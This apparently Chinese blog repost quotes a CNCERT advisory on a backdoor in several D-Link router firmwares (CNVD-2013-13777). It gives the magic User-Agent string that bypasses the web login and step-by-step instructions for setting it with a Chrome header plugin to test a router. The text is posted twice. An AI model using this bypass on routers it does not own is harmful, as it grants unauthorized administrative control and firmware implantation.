D-LINK路由器后门漏洞测试方法
2014-03-01 11:34
351 查看
国家互联网应急中心
http://www.cert.org.cn/publish/main/9/index.html
多款D-LINK路由器产品存在后门漏洞
(受影响的D-LINK路由固件版本涉及DIR-100、DI-524、DI-524UP、DI-604S、DI-604UP、DI-604+、TM-G5240、TM-G5240、BRL-04R、BRL-04UR、BRL-04CW、BRL-04FWU)
D-LINK部分路由器使用的固件版本中存在一个人为设置的后门漏洞(收录编号:CNVD-2013-13777)。攻击者通过修改User-Agent值为“xmlset_roodkcableoj28840ybtide”(没有引号)即可绕过路由器Web认证机制取得后台管理权限。取得后台管理权限后攻击者可以通过升级固件的方式植入后门,取得路由器的完全控制权。
D-LINK太狠了, HTTP消息头改个值就能绕过验证 ,如果你用的Google Chrome浏览器,可以去Chrmoe网上应用店下一个Header Hacker插件(https://chrome.google.com/webstore/detail/header-hacker/phnffahgegfkcobeaapbenpmdnkifigc/related)做测试
设置如下替换:
先用Chrome登陆你的D-LINK路由,shift+ctrl+c打开chrome自带的调试工具,选择network标签,刷新网页(在打开调试工具的情况下刷新),刷新后在左边找到该网页url,点击后右边选择headers,就可以看到当前网页的http头了, 比如:
Request Headersview source
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:zh-CN,zh;q=0.8
Cache-Control:max-age=0
Connection:keep-alive
Host:192.168.1.1
User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36
勾选插件刚才设置的替换值:
在打开调试工具的情况下刷新页面,观察HTTP的发送头(Request Headers)的User-Agent值是否改变,如:
Cache-Control:
max-age=0
Connection:
keep-alive
Host:
192.168.1.1
User-Agent:
xmlset_roodkcableoj28840ybtide <--------------已改变 说明插件改变成功
应为使用的不是D-Link路由,不知道会出现什么界面,大家自行测试吧,别用于非法用途就好.
http://www.cert.org.cn/publish/main/9/index.html
多款D-LINK路由器产品存在后门漏洞
(受影响的D-LINK路由固件版本涉及DIR-100、DI-524、DI-524UP、DI-604S、DI-604UP、DI-604+、TM-G5240、TM-G5240、BRL-04R、BRL-04UR、BRL-04CW、BRL-04FWU)
D-LINK部分路由器使用的固件版本中存在一个人为设置的后门漏洞(收录编号:CNVD-2013-13777)。攻击者通过修改User-Agent值为“xmlset_roodkcableoj28840ybtide”(没有引号)即可绕过路由器Web认证机制取得后台管理权限。取得后台管理权限后攻击者可以通过升级固件的方式植入后门,取得路由器的完全控制权。
D-LINK太狠了, HTTP消息头改个值就能绕过验证 ,如果你用的Google Chrome浏览器,可以去Chrmoe网上应用店下一个Header Hacker插件(https://chrome.google.com/webstore/detail/header-hacker/phnffahgegfkcobeaapbenpmdnkifigc/related)做测试
设置如下替换:
先用Chrome登陆你的D-LINK路由,shift+ctrl+c打开chrome自带的调试工具,选择network标签,刷新网页(在打开调试工具的情况下刷新),刷新后在左边找到该网页url,点击后右边选择headers,就可以看到当前网页的http头了, 比如:
Request Headersview source
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:zh-CN,zh;q=0.8
Cache-Control:max-age=0
Connection:keep-alive
Host:192.168.1.1
User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36
勾选插件刚才设置的替换值:
在打开调试工具的情况下刷新页面,观察HTTP的发送头(Request Headers)的User-Agent值是否改变,如:
Cache-Control:
max-age=0
Connection:
keep-alive
Host:
192.168.1.1
User-Agent:
xmlset_roodkcableoj28840ybtide <--------------已改变 说明插件改变成功
应为使用的不是D-Link路由,不知道会出现什么界面,大家自行测试吧,别用于非法用途就好.
相关文章推荐
- 北京联通 破解路由器方法(测试可用)
- csrf漏洞的测试方法
- TP-LINK路由器两种不同的级联方法
- TP-LINK无线路由器屏蔽恶意网站方法
- ADSL上网TP-LINK路由器设置方法
- DEDECMS安装之后需要做的事情!DEDECMS去除所有自带后门和 漏洞的方法
- 路由器吞吐量测试方法
- 【技术分享】TP-Link WR841N路由器任意代码执行漏洞分析(附演示视频)
- 路由器测试的类型和方法
- Bash远程解析命令执行漏洞测试方法
- TP-Link无线路由器经典设置方法
- 路由器测试的类型和方法
- Linuxglibc幽灵漏洞测试与修复方法
- 【dedecmsv5.7】DEDECMS安装之后需要做的事情!DEDECMS去除所有自带后门和 漏洞的方法(未写完)
- 灰帽黑客:正义黑客的道德规范、渗透测试、攻击方法和漏洞分析技术(第3版)
- Linux glibc幽灵漏洞测试与修复方法
- 黑客后门:Cisco 路由器 Tcl脚本第2次测试 推荐
- 我是如何反编译D-Link路由器固件程序并发现它的后门的
- EMULE 使用路由器LOW-ID解决方法(TPLINK TL-WR541G)